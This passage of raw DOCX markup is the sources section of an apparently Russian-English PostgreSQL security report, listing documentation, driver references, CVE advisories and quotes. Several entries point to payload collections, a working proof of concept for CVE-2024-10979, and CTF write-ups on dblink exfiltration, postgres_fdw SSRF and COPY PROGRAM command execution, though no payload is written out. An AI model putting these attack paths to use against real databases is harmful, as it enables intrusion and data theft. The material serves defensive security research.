                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="0563C1"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">pgPedia trusted extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Официальная документация PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовые: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Documentation (current)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — entry point.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The SQL Language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — синтаксис и semantics.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Server Administration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DBA reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные разделы, активно цитируемые:</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Lexical Structure (SQL Syntax)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dollar-quoted strings (R5), identifier quoting.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Functions and Operators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format()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quote_ident</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quote_literal</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System Catalogs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pg_class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pg_proc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pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.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System Views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pg_stats</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pg_stat_statements</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Predefined Roles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and friends.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Row Security Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS reference.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Server Configuration (postgresql.conf)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все GUC.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Client Authentication (pg_hba.conf)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — auth methods.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SSL Support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — TLS configuration.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Frontend/Backend Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — wire protocol (simple vs extended).</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libpq Functions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PQexec</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PQexecParams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PQescape*</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Release Notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — minor release notes (даты, CVE list).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL Security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Security Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все CVE advisories с CVSS и patched versions. Главный canonical source для CVE-данных.</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Versioning Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — major release cadence, EOL schedule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Driver documentation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psycopg2 — Passing parameters to SQL queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — text-mode параметризация.</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psycopg3 — Differences from psycopg2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extended protocol по умолчанию.</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psycopg3 — Server-side parameters binding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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> binding.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asyncpg — Basic Usage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-style parameters.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pgjdbc — Connecting</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preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметр.</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pgjdbc — PreferQueryMode</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simple</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extended</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extendedForPrepared</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pgx v5 — QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — режимы execution.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pgx v5 — Identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — safe identifier construction.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node-postgres — Queries</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client.query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API.</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node-postgres — Parameterized query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$1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> placeholders.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Npgsql — Basic Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — .NET PostgreSQL driver.</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Roji on Npgsql parameters batching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — internal parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry standards и cheat sheets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OWASP SQL Injection Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общие принципы.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OWASP Top 10 — A03: Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — context для priority.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Web Security Academy — SQL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — учебные материалы.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PortSwigger SQL injection cheat sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload reference (R19).</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HackTricks — PostgreSQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pentester-oriented cheat-sheet.</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PayloadsAllTheThings — PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload collection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor security blogs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Rapid7 Vulnerability Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — disclosure timelines.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Rapid7 — CVE-2025-1094 disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — verbatim chain analysis.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EnterpriseDB blog — security posts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — vendor commentary.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pganalyze blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — performance + security разборы.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SecureLayer7 — CVE-2025-1094</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chain analysis.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GBHackers — Critical PostgreSQL flaws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — coverage of August 2025 batch.</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Cyber Security News — pgAdmin vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R24 coverage.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RedRays — CVE-2024-10979 step-by-step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R7 PoC.</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IBM Security Bulletins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — multi-CVE coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF writeups и community sources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PDKT-Team CTF writeup (FBCTF 2019 hr-admin-module)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R1 dblink-эксфильтрация в practice.</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ibreak.software — SQL injection SSRF/XSPA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R2 postgres_fdw как SSRF.</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Greenwolf — Authenticated arbitrary command execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R3 COPY PROGRAM.</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PoC: gh-ost00/CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R7 working PoC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Specific bug-trackers / advisories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Red Hat Bugzilla 2247168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R14 точные затрагиваемые функции.</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PostgreSQL pgsql-bugs mailing list archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — public bug reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры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AWS RDS PostgreSQL release notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RDS-specific PG releases.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Google Cloud SQL release notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Cloud SQL releases.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Supabase changelog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Supabase versions.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Azure Database for PostgreSQL release notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Azure versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цитаты verbatim — где использованы</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Rapid7 на CVE-2025-1094 chain (см. 3.9.7, 4.7): «*Rapid7 discovered that in every scenario we tested, a successful exploit for CVE-2024-12356 had to include exploitation of CVE-2025-1094 in order to achieve remote code execution*».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advisory CVE-2023-5869 (см. 4.3): «*While modifying certain SQL array values, missing overflow checks let authenticated database users write arbitrary bytes to a memory area that facilitates arbitrary code execution.*»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PostgreSQL анонс PG 14 (см. 2.2): «*this release now makes it convenient to assign read-only and write-only privileges to users on tables, views, and schemas using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_write_all_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> predefined roles*».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libpq docs о PQexec (см. 3.5.0): «*Multiple queries sent in a single PQexec call are processed in a single transaction*».</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libpq docs о PQexecParams (см. 3.5.0): «*PQexecParams allows at most one SQL command in the given string*».</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Django docs о DEBUG (см. 3.2.5): «*When you're running a public site you should always turn off the DEBUG setting. That will make your server run much faster, and will also prevent malicious users from seeing details of your application that can be revealed by the error pages*».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Скрипты PostgreSQL community</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src/backend/commands/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — referenced для конкретных fix-commit-ов:</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analyze.c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cluster.c</w:t>
      </w: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indexcmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2022-1552 fix).</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functioncmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2022-2625 fix).</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schemacmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2023-2454 fix).</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statscmds.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2025-12817 fix).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src/backend/utils/adt/arrayfuncs.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2023-5869 fix.</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color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/mb/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-4207 fix (encnames.c, wchar.c).</w:t>
      </w:r>
